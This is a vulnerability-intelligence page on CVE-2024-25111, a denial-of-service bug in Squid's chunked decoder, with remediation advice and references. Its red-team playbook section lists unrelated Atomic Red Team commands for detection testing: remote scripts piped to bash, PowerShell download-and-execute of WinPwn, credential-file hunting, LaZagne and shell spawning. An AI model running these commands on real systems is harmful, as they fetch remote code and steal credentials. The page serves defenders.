CVE-2024-25111
Overview
This vulnerability is a denial of service caused by uncontrolled recursion within the HTTP Chunked decoder component of the Squid web proxy cache. The root cause is a flaw in the chunked transfer encoding parser that fails to properly handle crafted chunked HTTP messages, leading to excessive recursive calls. The affected component is the HTTP chunked decoding logic present in Squid versions from 3.5.27 up to but not including 6.8.
Vulnerability Description
Squid is a web proxy cache. Starting in version 3.5.27 and prior to version 6.8, Squid may be vulnerable to a Denial of Service attack against HTTP Chunked decoder due to an uncontrolled recursion bug. This problem allows a remote attacker to cause Denial of Service when sending a crafted, chunked, encoded HTTP Message. This bug is fixed in Squid version 6.8. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. There is no workaround for this issue.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending crafted chunked HTTP requests to the Squid proxy, triggering a denial of service through resource exhaustion caused by recursive processing. This results in service disruption, potentially impacting availability of the proxy service. The attack requires only network access to the proxy and no user interaction, consistent with the CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.
Solution
Remediation requires upgrading Squid to version 6.8 or later, where the uncontrolled recursion bug in the HTTP Chunked decoder has been fixed. For users on stable releases, Squid's patch archives provide backported fixes, such as the SQUID-2024_1.patch referenced in the official advisory (https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc). Fedora users should consult the Fedora package announcement mailing list for patched versions. No workaround is available.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the web proxy cache software, Squid, arises from an uncontrolled recursion bug within its HTTP Chunked decoder. This flaw affects versions starting from 3.5.27 up to 6.8, allowing a remote attacker to exploit the system by sending specially crafted chunked-encoded HTTP messages. The recursion issue can lead to a Denial of Service (DoS), where the server becomes unresponsive due to excessive resource consumption. The underlying problem lies in the way the software processes chunked transfer encoding, which is a mechanism used to send data in a series of chunks. If the server fails to manage the recursion properly, it can enter an infinite loop or consume excessive memory, ultimately crashing the service.
Attack vectors for this vulnerability are primarily network-based, as the exploitation requires the attacker to send malicious HTTP requests to the Squid proxy server. An attacker could craft a series of chunked messages that exploit the recursion flaw, leading to a denial of service. This can be executed from any location on the internet, making it particularly dangerous for publicly accessible proxies. Additionally, attackers may utilize automated scripts to continuously send these requests, amplifying the impact on the server and potentially affecting other services reliant on the proxy. Given the widespread use of Squid in various environments, including enterprise networks and cloud services, the potential for exploitation is significant.
The real-world impact of this vulnerability can be severe, especially for organizations that rely heavily on Squid for web caching and proxy services. A successful attack could lead to prolonged downtime, affecting business operations and user access to critical services. This downtime not only disrupts normal operations but can also result in financial losses, reputational damage, and potential legal ramifications if customer data is compromised or if service level agreements are violated. For organizations that handle sensitive data or operate in regulated industries, the implications of such a vulnerability could extend to compliance issues, further exacerbating the risks involved.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the latest version of Squid, which addresses the recursion issue. Regularly monitoring and applying patches from the vendor is crucial to maintaining security posture. Additionally, implementing network-based intrusion detection systems (IDS) can help identify unusual patterns of traffic that may indicate an ongoing attack. Rate limiting and access control measures can also be employed to reduce the risk of exploitation by restricting the number of requests from a single source. Furthermore, organizations should conduct regular security assessments and penetration testing to identify potential vulnerabilities in their systems proactively.
In conclusion, the vulnerability in Squid presents a significant threat due to its potential for remote exploitation and the resulting Denial of Service. Organizations must take proactive steps to mitigate the risk by upgrading their software, implementing detection mechanisms, and monitoring network traffic. By understanding the technical details, attack vectors, and potential impacts, businesses can better prepare for and defend against this type of vulnerability, ensuring the continuity of their operations and the security of their data.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-25111, with our sensors identifying new instances of exploitation attempts targeting the Squid HTTP Chunked decoder vulnerability. Although the overall EPSS score has slightly decreased, the recent upward trend in detection frequency over the past week indicates growing interest or testing by threat actors. This shift underscores an evolving threat landscape where adversaries may be actively probing for opportunities to disrupt services via Denial of Service attacks leveraging this uncontrolled recursion bug. While no new exploit variants or public proof-of-concept code have surfaced, the increased telemetry signals heightened operational focus on this vulnerability. Consequently, defenders should recognize that the risk environment is becoming more dynamic, warranting closer monitoring despite the absence of widespread exploitation campaigns. The threat level, therefore, should be considered elevated due to the combination of emerging exploitation attempts and persistent high severity, emphasizing the need for vigilance in detection and response capabilities.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 38 |
cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 39 |
cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*
|
|
|
Netapp | Bluexp | N/A |
cpe:2.3:a:netapp:bluexp:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-231 | Oversized Serialized Data Payloads |
33%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-25111 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc |
| squid-cache.org |
GitHub CVE
x_refsource_MISC
|
http://www.squid-cache.org/Versions/v6/SQUID-2024_1.patch |
| lists.fedoraproject.org |
GitHub CVE
|
https://lists.fedoraproject.org/archives/list/[email protected]/message/7R4KPSO3MQT3KAOZV7LC2GG3CYMCGK7H/ |
| lists.fedoraproject.org |
GitHub CVE
|
https://lists.fedoraproject.org/archives/list/[email protected]/message/XWQHRDRHDM5PQTU6BHH4C5KGL37X6TVI/ |
| security.netapp.com |
GitHub CVE
|
https://security.netapp.com/advisory/ntap-20240605-0001/ |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2025/03/msg00009.html |